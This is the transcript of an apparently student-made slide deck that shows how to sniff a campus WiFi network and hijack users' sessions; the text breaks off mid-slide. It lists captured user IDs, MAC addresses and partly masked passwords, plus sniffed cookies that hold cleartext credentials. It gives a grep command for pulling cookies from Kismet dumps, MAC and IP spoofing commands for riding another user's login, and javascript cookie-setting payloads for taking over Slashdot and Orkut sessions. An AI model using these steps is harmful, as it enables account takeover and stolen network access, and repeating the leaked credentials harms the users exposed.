smit wifi_2

Download Smit WiFi_2

Post on 25-May-2015

662 views

Category:

Technology

9 download

Embed Size (px)

TRANSCRIPT

  • 1. Down the rabbit-hole
      • a sneak peek at the SMIT-WiFi implementation
    • Amit Saraff
    • Ashish Shekhar

2. Tools Used

  • Nmap network scanner
  • Wireshark / Ethereal- packet analyzer
  • Kismet wireless sniffer
  • BurpSuite proxy (http header modifier)
  • Firefox web-browser
    • Live HTTP Headers
    • User Agent Switcher
    • Tamper Data
    • View Cookie CS
    • NoScript
  • Unix tools wget, curl, ssh, ifconfig etc.
  • Intel Centrino-based laptop running Slackware 9

3. Brief Overview

  • IP Range :- 172.16.183.0/22
  • WEP / WPA no (yes !!)
  • 4 different essid's -
    • SMITWiFi1
    • SMITWiFi2
    • SMITWiFi3
    • SMITWiFi4
    • different essid's / same channel ??

4. Brief Overview (cont..)

  • 172.16.183.1 router / DNS resolver / authenticator
  • 172.16.183.2 802.11b Access Point
  • 172.16.183.3 D-link DWL-900 AP+ (standard 802.11bg ap)
  • 172.16.183.4 (new) Another access-point ?

5. Initial Monitoring

  • E-mail accounts
    • [email_address]
    • [email_address]
    • [email_address]
    • [email_address]
    • [email_address]
    • [email_address]
    • [email_address]
    • [email_address]

6. Initial Monitoring (cont..)

  • and web addresses
    • www.orkut.com
    • www.cisco.com
    • www.wipro.com
    • www.musicgamesrefer.com
    • www.grisoft.com
    • www.yahoo.com
    • And some more orkut !!

7. But that's not what we are looking for !! 8. Wall of Sheep IP MAC User Password 172.16.183.1500:12:f0:db:ef:6fd205am_-_-i 172.16.183.2300:12:f0:64:0a:67g205ab_-_i 172.16.183.7800:13:ce:7b:d7:9bd108a1_3 172.16.183.11600:16:ce:54:69:48b206aj_-n 172.16.183.11700:12:f0:56:b7:3fk205an_-_-_-w 172.16.183.14900:15:00:22:c4:0fl205ap_-_-_-_4 172.16.183.15500:13:02:43:2b:0dr305ar_-_-_a 172.16.183.18000:12:f0:51:3b:e0j301ah_-_-_-a ** and this is just a small part of the list How about some user account details? 9. So how did this happen ? 10. 172.16.183.1 Authentication Server 11. Talk about multi-platform support 12. User Agent Switcher to the rescue 13. Background magic how it really works 14. How hard is it?

  • Log the network traffic using Kismet
  • And run -
  • ' strings Kismet*.dump|grep Cookie|egrep_Pass=[a-zA-Z0-9]+;'
  • to get :
  • Cookie:_UserName=m301a; _Pass=123;JSESSIONID=975DCC46FE52BC0A3CEFDA8E568A7293
  • Cookie:_UserName=r703a; _Pass=manisha; JSESSIONID=2914445C961B072A73498FDCC1CEB9AE

15. But that isn't very ethical

  • Problem How to get access to the internet without compromising another's account ?
  • Solution Study the entire process and find a work-around.

16. Brief Introduction to Cookies No not these cookies 17. So what are they ?

  • Parcels of text sent by a server to a web-browser and then sent unchanged back by the browser each time it accesses the server.
  • Used for authenticating, tracking and maintaining specific information about users.
  • We saw an example 2-3 slides back.
    • For those who missed it here it is again :
  • Cookie:_UserName=m301a;_Pass=123;JSESSIONID=975DCC46FE52BC0A3CEFDA8E5 68A7293

18. How do they help?

  • The SMIT server sets a cookie on each client it authenticates.
  • Refreshes it every 180 seconds.
  • How do I then get this cookie ?
  • And how will it help even if I do manage to capture it ?

19. Step 1 Find active hosts on the network :enter 'Kismet' 20. Step 1 (cont..) 21. Step 2 Select an active host andnote parameters ie. IP Address and MAC address. 22. Step 2 (cont..) Change settings locally to match host about to be compromised. For eg : ifconfig eth1 172.16.183.209 hw ether 00:13:02:C1:28:D4 route add default gw 172.16.183.1 23. Step 3

  • Fire up your browser Firefox in our case.
  • Type in the following URL :
    • http://172.16.183.1/24online/webpages/clientlogin.jsp?
    • loginstatus=true&logoutstatus=null&
    • message=&liverequesttime=180&
    • livemessage=null&url=&isAccessDenied=null&
    • fromlogout=null
  • This acts as a 'refresh' command to the server which replies back with the validated cookie.

24. ..to get 25. ..and we are online 26. Step 3 (cont..)

  • What this does :
    • Sets you up with the cookie
    • Refreshes itself every 180 seconds
    • Voila, you have free internet access (until the guy logs off / you log him off)
  • Node goes offline ?
    • Rinse and repeat the entire process with another IP.

27. Return to cookie-land

  • Authentication mechanisms
    • We just saw an abuse of the implicit trust mechanism guaranteed by cookies
    • But that was local
    • Can it be extended to other sites too?

28. Presenting Slashdot

  • Popular technology portal.
  • News site for anything regarding Technology / Linux / Politics / Science / YRO Your Rights Online and more.
  • Uses HTTP-POST mechanism for sending authentication data.

29. The main page 30. Login page 31. Cookie 32. Exploit-

  • To authenticate as that user simply capture the incoming cookie
  • Then in the address-bar type in :
  • javascript:document.cookie='user=609178::Ik2zsyez qK6AIER7rLuyD7; Domain=.slashdot.org;Path=/';

33. Result ? 34. So what ? But then that is hardly any sweat !! 35. Moving on - orkut.com

  • What is orkut ?
    • Social networking site.
    • Online community to meet new people and keep in touch with old ones.
    • Now part of the Google empire.
    • On in atleast 15 of the 20 or so computers in the campus cyber-cafe at any time of the day.

36. Main page. 37. First observations.

  • Note
    • The address-bar is yellow and there is a lock-sign on the taskbar.
    • What it means :
      • Site uses Secure-HTTP (Port 443 / https)
      • Certificate for validation (AES-256 bit encryption)
      • Trusted certificate issuer Thawte Consulting cc.
    • Actual login frame URL :
    • https://www.google.com/accounts/ServiceLoginBox?service=orkut&nui=2&uilel=1&skipvp age=true&msg%3D0%26page%3Dhttp%253A%252F%252Fwww.orkut.com%252F&followup=https%3A%2F%2Fwww.orkut.com%2FGLogin.aspx&hl=en-US

38. In other words that information is definitely not being cracked anytime soon . 39. Cookies, again?

  • Cookie generated on login :

40. Cookies, again ? (cont..)

  • 2 cookies set by the orkut domain
    • First one seems to be a user preference cookie
    • Second one is for timezone (??)

41. Cookie (1)

  • Question : Does Cookie 1 alone do the trick then ?
  • Solution : Grab another cookie and check.

42. Back to kismet dumps

  • Hunt for a cookie in the previous gathered logs.
  • strings Kismet-*dump|grep Cookie|greporkut -i
  • To get :
    • Cookie: orkut_state=ORKUTPREF=ID=7252002680339005281:INF=0:SET=111236439:LNG=1:CNT=91:RM=0:USR=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:PHS=:TS=1158132779:LCL=en-US:NET=1:TOS=2147483647:GC=DQAAAG8AAADkOy-V63iFe2aPbuAmCA-bDDU8_u94QUeUQfxAz3MzhkADniO0_SDGMp8ny5x-FwbOCrbZ_JGLohyBxL3Xkuxf3AbdmSE7TNsC3xCKaJM0uq8k44tQMcp51JuXfs70h-PrgMf37rc3w4_R0na3XJus:PE=cmFodWxfcm91dEByZWRpZmZtYWlsLmNvbQ==:GTI=0:GID=:S=HNmUSftD+sY4LAmmXVSy0U/jLIg=:

43. Set this cookiejavascript:document.cookie=' orkut_st